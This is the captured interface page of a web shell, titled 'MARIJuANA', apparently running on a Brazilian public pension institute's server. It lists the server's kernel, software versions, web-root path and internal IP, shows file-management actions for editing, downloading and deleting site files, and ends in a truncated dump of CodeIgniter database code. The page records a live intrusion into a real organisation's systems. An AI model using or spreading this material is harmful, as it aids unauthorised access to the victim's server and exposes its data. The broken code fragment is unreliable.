MARIJuANA
— DIOS — NO — CREA — NADA — EN — VANO —
Linux instance-20230208-1745 6.8.0-1013-oracle #13~22.04.1-Ubuntu SMP Mon Sep 2 13:02:56 UTC 2024 x86_64
  SOFT : Apache/2.4.52 (Ubuntu) PHP : 8.1.2-1ubuntu2.19
/var/www/instituto-previdencia/public_html/transparencia/system/database/
10.0.0.135

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACT ]
+FILE +DIR
drivers dir drwxrwxr-x 2023-05-03 21:28 R D
DB.php 6.587 KB -rw-rw-r-- 2023-05-03 21:30 R E G D
DB_active_rec.php 44.053 KB -rw-rw-r-- 2021-07-19 08:50 R E G D
DB_cache.php 5.83 KB -rw-rw-r-- 2023-05-03 21:30 R E G D
DB_driver.php 45.232 KB -rw-rw-r-- 2023-05-03 21:30 R E G D
DB_forge.php 23.651 KB -rw-rw-r-- 2023-05-03 21:30 R E G D
DB_query_builder.php 62.347 KB -rw-rw-r-- 2023-05-03 21:30 R E G D
DB_result.php 14.037 KB -rw-rw-r-- 2023-05-03 21:30 R E G D
DB_utility.php 10.673 KB -rw-rw-r-- 2023-05-03 21:30 R E G D
index.html 0.128 KB -rw-rw-r-- 2023-05-03 21:30 R E G D
REQUEST EXIT
db =& $db; log_message('info', 'Database Forge Class Initialized'); } // -------------------------------------------------------------------- /** * Create database * * @param string $db_name * @return bool */ public function create_database($db_name) { if ($this->_create_database === FALSE) { return ($this->db->db_debug) ? $this->db->display_error('db_unsupported_feature') : FALSE; } elseif ( ! $this->db->query(sprintf($this->_create_database, $this->db->escape_identifiers($db_name), $this->db->char_set, $this->db->dbcollat))) { return ($this->db->db_debug) ? $this->db->display_error('db_unable_to_drop') : FALSE; } if ( ! empty($this->db->data_cache['db_names'])) { $this->db->data_cache['db_names'][] = $db_name; } return TRUE; } // -------------------------------------------------------------------- /** * Drop database * * @param string $db_name * @return bool */ public function drop_database($db_name) { if ($this->_drop_database === FALSE) { return ($this->db->db_debug) ? $this->db->display_error('db_unsupported_featu